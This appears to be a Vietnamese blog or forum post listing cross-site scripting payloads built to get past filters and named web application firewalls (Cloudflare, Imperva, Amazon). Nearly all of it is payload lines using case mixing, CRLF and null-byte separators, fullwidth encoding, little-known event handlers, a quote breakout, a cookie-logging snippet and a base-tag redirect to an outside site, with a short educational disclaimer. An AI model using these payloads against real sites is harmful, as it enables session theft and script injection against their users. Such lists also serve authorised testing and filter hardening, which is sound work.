Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm.

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.
Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.”

Cloudflare XSS Bypass

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

<img src=x onVector=X-Vector onerror=alert(1)>

XXS Bypass Imperva WAF

(Z("onerror="a=console,a.log`${cookie}`"

Bypass WAF Amazon

<a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>

Crlf injection to bypass javascript: Đang bị bờ lách lít

java%0d%0ascript%0d%0a:alert(0)

Trong trường hợp svg onload= bị filter, %0d sẽ đóng vai trò dấu ngăn cách và thỉnh thoảng cũng phá được waf :v.) %0a %0c %09 %00 cũng hay được sử dụng lắm nhé

<svg%0donload=prompt(1)>

Cách này bt không có gì :v

<input onfocus=alert(0) autofocus>

The use of \\ will break out of the quote inside a script tag

\\"-alert(0);//

The WAF blacklisted alert(0), prompt(0), but failed to filter confirm(1) aswell as onmouseenter=. Onmouseneter does the same as onmouseover= but a lot of devs seem to not know this (not sure why) and fail to blacklist it.

"onmouseenter=confirm(1)>

HTML Injection?

<base href=//yoursite.com>

Méo hiểu nổi

%uff1cscript%uff1ealert(1)%uff1c/script%uff1